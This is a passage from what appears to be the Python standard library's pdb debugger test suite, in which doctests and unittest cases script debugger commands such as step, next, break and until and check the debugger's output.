>>> with PdbTestInput([ # doctest: +ELLIPSIS, +NORMALIZE_WHITESPACE
... 'step', # entering the function call
... 'args', # display function args
... 'list', # list function source
... 'bt', # display backtrace
... 'up', # step up to test_function()
... 'down', # step down to test_function_2() again
... 'next', # stepping to print(foo)
... 'next', # stepping to the for loop
... 'step', # stepping into the for loop
... 'until', # continuing until out of the for loop
... 'next', # executing the print(bar)
... 'jump 8', # jump over second for loop
... 'return', # return out of function
... 'retval', # display return value
... 'next', # step to test_function3()
... 'step', # stepping into test_function3()
... 'args', # display function args
... 'return', # return out of function
... 'next', # step to test_function4()
... 'step', # stepping to test_function4()
... 'args', # display function args
... 'continue',
... ]):
... test_function()
> <doctest test.test_pdb.test_pdb_basic_commands[3]>(3)test_function()
-> ret = test_function_2('baz')
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(1)test_function_2()
-> def test_function_2(foo, bar='default'):
(Pdb) args
foo = 'baz'
bar = 'default'
(Pdb) list
1 -> def test_function_2(foo, bar='default'):
2 print(foo)
3 for i in range(5):
4 print(i)
5 print(bar)
6 for i in range(10):
7 never_executed
8 print('after for')
9 print('...')
10 return foo.upper()
[EOF]
(Pdb) bt
...
<doctest test.test_pdb.test_pdb_basic_commands[4]>(25)<module>()
-> test_function()
<doctest test.test_pdb.test_pdb_basic_commands[3]>(3)test_function()
-> ret = test_function_2('baz')
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(1)test_function_2()
-> def test_function_2(foo, bar='default'):
(Pdb) up
> <doctest test.test_pdb.test_pdb_basic_commands[3]>(3)test_function()
-> ret = test_function_2('baz')
(Pdb) down
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(1)test_function_2()
-> def test_function_2(foo, bar='default'):
(Pdb) next
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(2)test_function_2()
-> print(foo)
(Pdb) next
baz
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(3)test_function_2()
-> for i in range(5):
(Pdb) step
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(4)test_function_2()
-> print(i)
(Pdb) until
0
1
2
3
4
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(5)test_function_2()
-> print(bar)
(Pdb) next
default
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(6)test_function_2()
-> for i in range(10):
(Pdb) jump 8
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(8)test_function_2()
-> print('after for')
(Pdb) return
after for
...
--Return--
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(10)test_function_2()->'BAZ'
-> return foo.upper()
(Pdb) retval
'BAZ'
(Pdb) next
> <doctest test.test_pdb.test_pdb_basic_commands[3]>(4)test_function()
-> test_function3(kwonly=True)
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_basic_commands[1]>(1)test_function3()
-> def test_function3(arg=None, *, kwonly=None):
(Pdb) args
arg = None
kwonly = True
(Pdb) return
--Return--
> <doctest test.test_pdb.test_pdb_basic_commands[1]>(2)test_function3()->None
-> pass
(Pdb) next
> <doctest test.test_pdb.test_pdb_basic_commands[3]>(5)test_function()
-> test_function4(1, 2, 3)
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_basic_commands[2]>(1)test_function4()
-> def test_function4(a, b, c, /):
(Pdb) args
a = 1
b = 2
c = 3
(Pdb) continue
BAZ
"""
def test_pdb_breakpoint_commands():
"""Test basic commands related to breakpoints.
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... print(1)
... print(2)
... print(3)
... print(4)
First, need to clear bdb state that might be left over from previous tests.
Otherwise, the new breakpoints might get assigned different numbers.
>>> from bdb import Breakpoint
>>> Breakpoint.next = 1
>>> Breakpoint.bplist = {}
>>> Breakpoint.bpbynumber = [None]
Now test the breakpoint commands. NORMALIZE_WHITESPACE is needed because
the breakpoint list outputs a tab for the "stop only" and "ignore next"
lines, which we don't want to put in here.
>>> with PdbTestInput([ # doctest: +NORMALIZE_WHITESPACE
... 'break 3',
... 'disable 1',
... 'ignore 1 10',
... 'condition 1 1 < 2',
... 'break 4',
... 'break 4',
... 'break',
... 'clear 3',
... 'break',
... 'condition 1',
... 'enable 1',
... 'clear 1',
... 'commands 2',
... 'p "42"',
... 'print("42", 7*6)', # Issue 18764 (not about breakpoints)
... 'end',
... 'continue', # will stop at breakpoint 2 (line 4)
... 'clear', # clear all!
... 'y',
... 'tbreak 5',
... 'continue', # will stop at temporary breakpoint
... 'break', # make sure breakpoint is gone
... 'continue',
... ]):
... test_function()
> <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>(3)test_function()
-> print(1)
(Pdb) break 3
Breakpoint 1 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
(Pdb) disable 1
Disabled breakpoint 1 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
(Pdb) ignore 1 10
Will ignore next 10 crossings of breakpoint 1.
(Pdb) condition 1 1 < 2
New condition set for breakpoint 1.
(Pdb) break 4
Breakpoint 2 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
(Pdb) break 4
Breakpoint 3 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
(Pdb) break
Num Type Disp Enb Where
1 breakpoint keep no at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
stop only if 1 < 2
ignore next 10 hits
2 breakpoint keep yes at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
3 breakpoint keep yes at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
(Pdb) clear 3
Deleted breakpoint 3 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
(Pdb) break
Num Type Disp Enb Where
1 breakpoint keep no at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
stop only if 1 < 2
ignore next 10 hits
2 breakpoint keep yes at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
(Pdb) condition 1
Breakpoint 1 is now unconditional.
(Pdb) enable 1
Enabled breakpoint 1 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
(Pdb) clear 1
Deleted breakpoint 1 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
(Pdb) commands 2
(com) p "42"
(com) print("42", 7*6)
(com) end
(Pdb) continue
1
'42'
42 42
> <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>(4)test_function()
-> print(2)
(Pdb) clear
Clear all breaks? y
Deleted breakpoint 2 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
(Pdb) tbreak 5
Breakpoint 4 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:5
(Pdb) continue
2
Deleted breakpoint 4 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:5
> <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>(5)test_function()
-> print(3)
(Pdb) break
(Pdb) continue
3
4
"""
def do_nothing():
pass
def do_something():
print(42)
def test_list_commands():
"""Test the list and source commands of pdb.
>>> def test_function_2(foo):
... import test.test_pdb
... test.test_pdb.do_nothing()
... 'some...'
... 'more...'
... 'code...'
... 'to...'
... 'make...'
... 'a...'
... 'long...'
... 'listing...'
... 'useful...'
... '...'
... '...'
... return foo
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... ret = test_function_2('baz')
>>> with PdbTestInput([ # doctest: +ELLIPSIS, +NORMALIZE_WHITESPACE
... 'list', # list first function
... 'step', # step into second function
... 'list', # list second function
... 'list', # continue listing to EOF
... 'list 1,3', # list specific lines
... 'list x', # invalid argument
... 'next', # step to import
... 'next', # step over import
... 'step', # step into do_nothing
... 'longlist', # list all lines
... 'source do_something', # list all lines of function
... 'source fooxxx', # something that doesn't exit
... 'continue',
... ]):
... test_function()
> <doctest test.test_pdb.test_list_commands[1]>(3)test_function()
-> ret = test_function_2('baz')
(Pdb) list
1 def test_function():
2 import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
3 -> ret = test_function_2('baz')
[EOF]
(Pdb) step
--Call--
> <doctest test.test_pdb.test_list_commands[0]>(1)test_function_2()
-> def test_function_2(foo):
(Pdb) list
1 -> def test_function_2(foo):
2 import test.test_pdb
3 test.test_pdb.do_nothing()
4 'some...'
5 'more...'
6 'code...'
7 'to...'
8 'make...'
9 'a...'
10 'long...'
11 'listing...'
(Pdb) list
12 'useful...'
13 '...'
14 '...'
15 return foo
[EOF]
(Pdb) list 1,3
1 -> def test_function_2(foo):
2 import test.test_pdb
3 test.test_pdb.do_nothing()
(Pdb) list x
*** ...
(Pdb) next
> <doctest test.test_pdb.test_list_commands[0]>(2)test_function_2()
-> import test.test_pdb
(Pdb) next
> <doctest test.test_pdb.test_list_commands[0]>(3)test_function_2()
-> test.test_pdb.do_nothing()
(Pdb) step
--Call--
> ...test_pdb.py(...)do_nothing()
-> def do_nothing():
(Pdb) longlist
... -> def do_nothing():
... pass
(Pdb) source do_something
... def do_something():
... print(42)
(Pdb) source fooxxx
*** ...
(Pdb) continue
"""
def test_post_mortem():
"""Test post mortem traceback debugging.
>>> def test_function_2():
... try:
... 1/0
... finally:
... print('Exception!')
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... test_function_2()
... print('Not reached.')
>>> with PdbTestInput([ # doctest: +ELLIPSIS, +NORMALIZE_WHITESPACE
... 'next', # step over exception-raising call
... 'bt', # get a backtrace
... 'list', # list code of test_function()
... 'down', # step into test_function_2()
... 'list', # list code of test_function_2()
... 'continue',
... ]):
... try:
... test_function()
... except ZeroDivisionError:
... print('Correctly reraised.')
> <doctest test.test_pdb.test_post_mortem[1]>(3)test_function()
-> test_function_2()
(Pdb) next
Exception!
ZeroDivisionError: division by zero
> <doctest test.test_pdb.test_post_mortem[1]>(3)test_function()
-> test_function_2()
(Pdb) bt
...
<doctest test.test_pdb.test_post_mortem[2]>(10)<module>()
-> test_function()
> <doctest test.test_pdb.test_post_mortem[1]>(3)test_function()
-> test_function_2()
<doctest test.test_pdb.test_post_mortem[0]>(3)test_function_2()
-> 1/0
(Pdb) list
1 def test_function():
2 import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
3 -> test_function_2()
4 print('Not reached.')
[EOF]
(Pdb) down
> <doctest test.test_pdb.test_post_mortem[0]>(3)test_function_2()
-> 1/0
(Pdb) list
1 def test_function_2():
2 try:
3 >> 1/0
4 finally:
5 -> print('Exception!')
[EOF]
(Pdb) continue
Correctly reraised.
"""
def test_pdb_skip_modules():
"""This illustrates the simple case of module skipping.
>>> def skip_module():
... import string
... import pdb; pdb.Pdb(skip=['stri*'], nosigint=True, readrc=False).set_trace()
... string.capwords('FOO')
>>> with PdbTestInput([
... 'step',
... 'continue',
... ]):
... skip_module()
> <doctest test.test_pdb.test_pdb_skip_modules[0]>(4)skip_module()
-> string.capwords('FOO')
(Pdb) step
--Return--
> <doctest test.test_pdb.test_pdb_skip_modules[0]>(4)skip_module()->None
-> string.capwords('FOO')
(Pdb) continue
"""
# Module for testing skipping of module that makes a callback
mod = types.ModuleType('module_to_skip')
exec('def foo_pony(callback): x = 1; callback(); return None', mod.__dict__)
def test_pdb_skip_modules_with_callback():
"""This illustrates skipping of modules that call into other code.
>>> def skip_module():
... def callback():
... return None
... import pdb; pdb.Pdb(skip=['module_to_skip*'], nosigint=True, readrc=False).set_trace()
... mod.foo_pony(callback)
>>> with PdbTestInput([
... 'step',
... 'step',
... 'step',
... 'step',
... 'step',
... 'continue',
... ]):
... skip_module()
... pass # provides something to "step" to
> <doctest test.test_pdb.test_pdb_skip_modules_with_callback[0]>(5)skip_module()
-> mod.foo_pony(callback)
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_skip_modules_with_callback[0]>(2)callback()
-> def callback():
(Pdb) step
> <doctest test.test_pdb.test_pdb_skip_modules_with_callback[0]>(3)callback()
-> return None
(Pdb) step
--Return--
> <doctest test.test_pdb.test_pdb_skip_modules_with_callback[0]>(3)callback()->None
-> return None
(Pdb) step
--Return--
> <doctest test.test_pdb.test_pdb_skip_modules_with_callback[0]>(5)skip_module()->None
-> mod.foo_pony(callback)
(Pdb) step
> <doctest test.test_pdb.test_pdb_skip_modules_with_callback[1]>(10)<module>()
-> pass # provides something to "step" to
(Pdb) continue
"""
def test_pdb_continue_in_bottomframe():
"""Test that "continue" and "next" work properly in bottom frame (issue #5294).
>>> def test_function():
... import pdb, sys; inst = pdb.Pdb(nosigint=True, readrc=False)
... inst.set_trace()
... inst.botframe = sys._getframe() # hackery to get the right botframe
... print(1)
... print(2)
... print(3)
... print(4)
>>> with PdbTestInput([ # doctest: +ELLIPSIS
... 'next',
... 'break 7',
... 'continue',
... 'next',
... 'continue',
... 'continue',
... ]):
... test_function()
> <doctest test.test_pdb.test_pdb_continue_in_bottomframe[0]>(4)test_function()
-> inst.botframe = sys._getframe() # hackery to get the right botframe
(Pdb) next
> <doctest test.test_pdb.test_pdb_continue_in_bottomframe[0]>(5)test_function()
-> print(1)
(Pdb) break 7
Breakpoint ... at <doctest test.test_pdb.test_pdb_continue_in_bottomframe[0]>:7
(Pdb) continue
1
2
> <doctest test.test_pdb.test_pdb_continue_in_bottomframe[0]>(7)test_function()
-> print(3)
(Pdb) next
3
> <doctest test.test_pdb.test_pdb_continue_in_bottomframe[0]>(8)test_function()
-> print(4)
(Pdb) continue
4
"""
def pdb_invoke(method, arg):
"""Run pdb.method(arg)."""
getattr(pdb.Pdb(nosigint=True, readrc=False), method)(arg)
def test_pdb_run_with_incorrect_argument():
"""Testing run and runeval with incorrect first argument.
>>> pti = PdbTestInput(['continue',])
>>> with pti:
... pdb_invoke('run', lambda x: x)
Traceback (most recent call last):
TypeError: exec() arg 1 must be a string, bytes or code object
>>> with pti:
... pdb_invoke('runeval', lambda x: x)
Traceback (most recent call last):
TypeError: eval() arg 1 must be a string, bytes or code object
"""
def test_pdb_run_with_code_object():
"""Testing run and runeval with code object as a first argument.
>>> with PdbTestInput(['step','x', 'continue']): # doctest: +ELLIPSIS
... pdb_invoke('run', compile('x=1', '<string>', 'exec'))
> <string>(1)<module>()...
(Pdb) step
--Return--
> <string>(1)<module>()->None
(Pdb) x
1
(Pdb) continue
>>> with PdbTestInput(['x', 'continue']):
... x=0
... pdb_invoke('runeval', compile('x+1', '<string>', 'eval'))
> <string>(1)<module>()->None
(Pdb) x
1
(Pdb) continue
"""
def test_next_until_return_at_return_event():
"""Test that pdb stops after a next/until/return issued at a return debug event.
>>> def test_function_2():
... x = 1
... x = 2
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... test_function_2()
... test_function_2()
... test_function_2()
... end = 1
>>> from bdb import Breakpoint
>>> Breakpoint.next = 1
>>> with PdbTestInput(['break test_function_2',
... 'continue',
... 'return',
... 'next',
... 'continue',
... 'return',
... 'until',
... 'continue',
... 'return',
... 'return',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_next_until_return_at_return_event[1]>(3)test_function()
-> test_function_2()
(Pdb) break test_function_2
Breakpoint 1 at <doctest test.test_pdb.test_next_until_return_at_return_event[0]>:1
(Pdb) continue
> <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(2)test_function_2()
-> x = 1
(Pdb) return
--Return--
> <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(3)test_function_2()->None
-> x = 2
(Pdb) next
> <doctest test.test_pdb.test_next_until_return_at_return_event[1]>(4)test_function()
-> test_function_2()
(Pdb) continue
> <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(2)test_function_2()
-> x = 1
(Pdb) return
--Return--
> <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(3)test_function_2()->None
-> x = 2
(Pdb) until
> <doctest test.test_pdb.test_next_until_return_at_return_event[1]>(5)test_function()
-> test_function_2()
(Pdb) continue
> <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(2)test_function_2()
-> x = 1
(Pdb) return
--Return--
> <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(3)test_function_2()->None
-> x = 2
(Pdb) return
> <doctest test.test_pdb.test_next_until_return_at_return_event[1]>(6)test_function()
-> end = 1
(Pdb) continue
"""
def test_pdb_next_command_for_generator():
"""Testing skip unwindng stack on yield for generators for "next" command
>>> def test_gen():
... yield 0
... return 1
... yield 2
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... it = test_gen()
... try:
... if next(it) != 0:
... raise AssertionError
... next(it)
... except StopIteration as ex:
... if ex.value != 1:
... raise AssertionError
... print("finished")
>>> with PdbTestInput(['step',
... 'step',
... 'step',
... 'next',
... 'next',
... 'step',
... 'step',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_next_command_for_generator[1]>(3)test_function()
-> it = test_gen()
(Pdb) step
> <doctest test.test_pdb.test_pdb_next_command_for_generator[1]>(4)test_function()
-> try:
(Pdb) step
> <doctest test.test_pdb.test_pdb_next_command_for_generator[1]>(5)test_function()
-> if next(it) != 0:
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_next_command_for_generator[0]>(1)test_gen()
-> def test_gen():
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_for_generator[0]>(2)test_gen()
-> yield 0
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_for_generator[0]>(3)test_gen()
-> return 1
(Pdb) step
--Return--
> <doctest test.test_pdb.test_pdb_next_command_for_generator[0]>(3)test_gen()->1
-> return 1
(Pdb) step
StopIteration: 1
> <doctest test.test_pdb.test_pdb_next_command_for_generator[1]>(7)test_function()
-> next(it)
(Pdb) continue
finished
"""
def test_pdb_next_command_for_coroutine():
"""Testing skip unwindng stack on yield for coroutines for "next" command
>>> import asyncio
>>> async def test_coro():
... await asyncio.sleep(0)
... await asyncio.sleep(0)
... await asyncio.sleep(0)
>>> async def test_main():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... await test_coro()
>>> def test_function():
... loop = asyncio.new_event_loop()
... loop.run_until_complete(test_main())
... loop.close()
... asyncio.set_event_loop_policy(None)
... print("finished")
>>> with PdbTestInput(['step',
... 'step',
... 'next',
... 'next',
... 'next',
... 'step',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_next_command_for_coroutine[2]>(3)test_main()
-> await test_coro()
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_next_command_for_coroutine[1]>(1)test_coro()
-> async def test_coro():
(Pdb) step
> <doctest test.test_pdb.test_pdb_next_command_for_coroutine[1]>(2)test_coro()
-> await asyncio.sleep(0)
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_for_coroutine[1]>(3)test_coro()
-> await asyncio.sleep(0)
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_for_coroutine[1]>(4)test_coro()
-> await asyncio.sleep(0)
(Pdb) next
Internal StopIteration
> <doctest test.test_pdb.test_pdb_next_command_for_coroutine[2]>(3)test_main()
-> await test_coro()
(Pdb) step
--Return--
> <doctest test.test_pdb.test_pdb_next_command_for_coroutine[2]>(3)test_main()->None
-> await test_coro()
(Pdb) continue
finished
"""
def test_pdb_next_command_for_asyncgen():
"""Testing skip unwindng stack on yield for coroutines for "next" command
>>> import asyncio
>>> async def agen():
... yield 1
... await asyncio.sleep(0)
... yield 2
>>> async def test_coro():
... async for x in agen():
... print(x)
>>> async def test_main():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... await test_coro()
>>> def test_function():
... loop = asyncio.new_event_loop()
... loop.run_until_complete(test_main())
... loop.close()
... asyncio.set_event_loop_policy(None)
... print("finished")
>>> with PdbTestInput(['step',
... 'step',
... 'next',
... 'next',
... 'step',
... 'next',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_next_command_for_asyncgen[3]>(3)test_main()
-> await test_coro()
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_next_command_for_asyncgen[2]>(1)test_coro()
-> async def test_coro():
(Pdb) step
> <doctest test.test_pdb.test_pdb_next_command_for_asyncgen[2]>(2)test_coro()
-> async for x in agen():
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_for_asyncgen[2]>(3)test_coro()
-> print(x)
(Pdb) next
1
> <doctest test.test_pdb.test_pdb_next_command_for_asyncgen[2]>(2)test_coro()
-> async for x in agen():
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_next_command_for_asyncgen[1]>(2)agen()
-> yield 1
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_for_asyncgen[1]>(3)agen()
-> await asyncio.sleep(0)
(Pdb) continue
2
finished
"""
def test_pdb_return_command_for_generator():
"""Testing no unwindng stack on yield for generators
for "return" command
>>> def test_gen():
... yield 0
... return 1
... yield 2
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... it = test_gen()
... try:
... if next(it) != 0:
... raise AssertionError
... next(it)
... except StopIteration as ex:
... if ex.value != 1:
... raise AssertionError
... print("finished")
>>> with PdbTestInput(['step',
... 'step',
... 'step',
... 'return',
... 'step',
... 'step',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(3)test_function()
-> it = test_gen()
(Pdb) step
> <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(4)test_function()
-> try:
(Pdb) step
> <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(5)test_function()
-> if next(it) != 0:
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_return_command_for_generator[0]>(1)test_gen()
-> def test_gen():
(Pdb) return
StopIteration: 1
> <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(7)test_function()
-> next(it)
(Pdb) step
> <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(8)test_function()
-> except StopIteration as ex:
(Pdb) step
> <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(9)test_function()
-> if ex.value != 1:
(Pdb) continue
finished
"""
def test_pdb_return_command_for_coroutine():
"""Testing no unwindng stack on yield for coroutines for "return" command
>>> import asyncio
>>> async def test_coro():
... await asyncio.sleep(0)
... await asyncio.sleep(0)
... await asyncio.sleep(0)
>>> async def test_main():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... await test_coro()
>>> def test_function():
... loop = asyncio.new_event_loop()
... loop.run_until_complete(test_main())
... loop.close()
... asyncio.set_event_loop_policy(None)
... print("finished")
>>> with PdbTestInput(['step',
... 'step',
... 'next',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_return_command_for_coroutine[2]>(3)test_main()
-> await test_coro()
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_return_command_for_coroutine[1]>(1)test_coro()
-> async def test_coro():
(Pdb) step
> <doctest test.test_pdb.test_pdb_return_command_for_coroutine[1]>(2)test_coro()
-> await asyncio.sleep(0)
(Pdb) next
> <doctest test.test_pdb.test_pdb_return_command_for_coroutine[1]>(3)test_coro()
-> await asyncio.sleep(0)
(Pdb) continue
finished
"""
def test_pdb_until_command_for_generator():
"""Testing no unwindng stack on yield for generators
for "until" command if target breakpoing is not reached
>>> def test_gen():
... yield 0
... yield 1
... yield 2
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... for i in test_gen():
... print(i)
... print("finished")
>>> with PdbTestInput(['step',
... 'until 4',
... 'step',
... 'step',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_until_command_for_generator[1]>(3)test_function()
-> for i in test_gen():
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_until_command_for_generator[0]>(1)test_gen()
-> def test_gen():
(Pdb) until 4
0
1
> <doctest test.test_pdb.test_pdb_until_command_for_generator[0]>(4)test_gen()
-> yield 2
(Pdb) step
--Return--
> <doctest test.test_pdb.test_pdb_until_command_for_generator[0]>(4)test_gen()->2
-> yield 2
(Pdb) step
> <doctest test.test_pdb.test_pdb_until_command_for_generator[1]>(4)test_function()
-> print(i)
(Pdb) continue
2
finished
"""
def test_pdb_until_command_for_coroutine():
"""Testing no unwindng stack for coroutines
for "until" command if target breakpoing is not reached
>>> import asyncio
>>> async def test_coro():
... print(0)
... await asyncio.sleep(0)
... print(1)
... await asyncio.sleep(0)
... print(2)
... await asyncio.sleep(0)
... print(3)
>>> async def test_main():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... await test_coro()
>>> def test_function():
... loop = asyncio.new_event_loop()
... loop.run_until_complete(test_main())
... loop.close()
... asyncio.set_event_loop_policy(None)
... print("finished")
>>> with PdbTestInput(['step',
... 'until 8',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_until_command_for_coroutine[2]>(3)test_main()
-> await test_coro()
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_until_command_for_coroutine[1]>(1)test_coro()
-> async def test_coro():
(Pdb) until 8
0
1
2
> <doctest test.test_pdb.test_pdb_until_command_for_coroutine[1]>(8)test_coro()
-> print(3)
(Pdb) continue
3
finished
"""
def test_pdb_next_command_in_generator_for_loop():
"""The next command on returning from a generator controlled by a for loop.
>>> def test_gen():
... yield 0
... return 1
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... for i in test_gen():
... print('value', i)
... x = 123
>>> with PdbTestInput(['break test_gen',
... 'continue',
... 'next',
... 'next',
... 'next',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[1]>(3)test_function()
-> for i in test_gen():
(Pdb) break test_gen
Breakpoint 6 at <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[0]>:1
(Pdb) continue
> <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[0]>(2)test_gen()
-> yield 0
(Pdb) next
value 0
> <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[0]>(3)test_gen()
-> return 1
(Pdb) next
Internal StopIteration: 1
> <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[1]>(3)test_function()
-> for i in test_gen():
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[1]>(5)test_function()
-> x = 123
(Pdb) continue
"""
def test_pdb_next_command_subiterator():
"""The next command in a generator with a subiterator.
>>> def test_subgenerator():
... yield 0
... return 1
>>> def test_gen():
... x = yield from test_subgenerator()
... return x
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... for i in test_gen():
... print('value', i)
... x = 123
>>> with PdbTestInput(['step',
... 'step',
... 'next',
... 'next',
... 'next',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_next_command_subiterator[2]>(3)test_function()
-> for i in test_gen():
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_next_command_subiterator[1]>(1)test_gen()
-> def test_gen():
(Pdb) step
> <doctest test.test_pdb.test_pdb_next_command_subiterator[1]>(2)test_gen()
-> x = yield from test_subgenerator()
(Pdb) next
value 0
> <doctest test.test_pdb.test_pdb_next_command_subiterator[1]>(3)test_gen()
-> return x
(Pdb) next
Internal StopIteration: 1
> <doctest test.test_pdb.test_pdb_next_command_subiterator[2]>(3)test_function()
-> for i in test_gen():
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_subiterator[2]>(5)test_function()
-> x = 123
(Pdb) continue
"""
def test_pdb_issue_20766():
"""Test for reference leaks when the SIGINT handler is set.
>>> def test_function():
... i = 1
... while i <= 2:
... sess = pdb.Pdb()
... sess.set_trace(sys._getframe())
... print('pdb %d: %s' % (i, sess._previous_sigint_handler))
... i += 1
>>> with PdbTestInput(['continue',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_issue_20766[0]>(6)test_function()
-> print('pdb %d: %s' % (i, sess._previous_sigint_handler))
(Pdb) continue
pdb 1: <built-in function default_int_handler>
> <doctest test.test_pdb.test_pdb_issue_20766[0]>(5)test_function()
-> sess.set_trace(sys._getframe())
(Pdb) continue
pdb 2: <built-in function default_int_handler>
"""
class PdbTestCase(unittest.TestCase):
def tearDown(self):
support.unlink(support.TESTFN)
def _run_pdb(self, pdb_args, commands):
self.addCleanup(support.rmtree, '__pycache__')
cmd = [sys.executable, '-m', 'pdb'] + pdb_args
with subprocess.Popen(
cmd,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.STDOUT,
) as proc:
stdout, stderr = proc.communicate(str.encode(commands))
stdout = stdout and bytes.decode(stdout)
stderr = stderr and bytes.decode(stderr)
return stdout, stderr
def run_pdb_script(self, script, commands):
"""Run 'script' lines with pdb and the pdb 'commands'."""
filename = 'main.py'
with open(filename, 'w') as f:
f.write(textwrap.dedent(script))
self.addCleanup(support.unlink, filename)
return self._run_pdb([filename], commands)
def run_pdb_module(self, script, commands):
"""Runs the script code as part of a module"""
self.module_name = 't_main'
support.rmtree(self.module_name)
main_file = self.module_name + '/__main__.py'
init_file = self.module_name + '/__init__.py'
os.mkdir(self.module_name)
with open(init_file, 'w') as f:
pass
with open(main_file, 'w') as f:
f.write(textwrap.dedent(script))
self.addCleanup(support.rmtree, self.module_name)
return self._run_pdb(['-m', self.module_name], commands)
def _assert_find_function(self, file_content, func_name, expected):
with open(support.TESTFN, 'wb') as f:
f.write(file_content)
expected = None if not expected else (
expected[0], support.TESTFN, expected[1])
self.assertEqual(
expected, pdb.find_function(func_name, support.TESTFN))
def test_find_function_empty_file(self):
self._assert_find_function(b'', 'foo', None)
def test_find_function_found(self):
self._assert_find_function(
"""\
def foo():
pass
def bœr():
pass
def quux():
pass
""".encode(),
'bœr',
('bœr', 4),
)
def test_find_function_found_with_encoding_cookie(self):
self._assert_find_function(
"""\
# coding: iso-8859-15
def foo():
pass
def bœr():
pass
def quux():
pass
""".encode('iso-8859-15'),
'bœr',
('bœr', 5),
)
def test_find_function_found_with_bom(self):
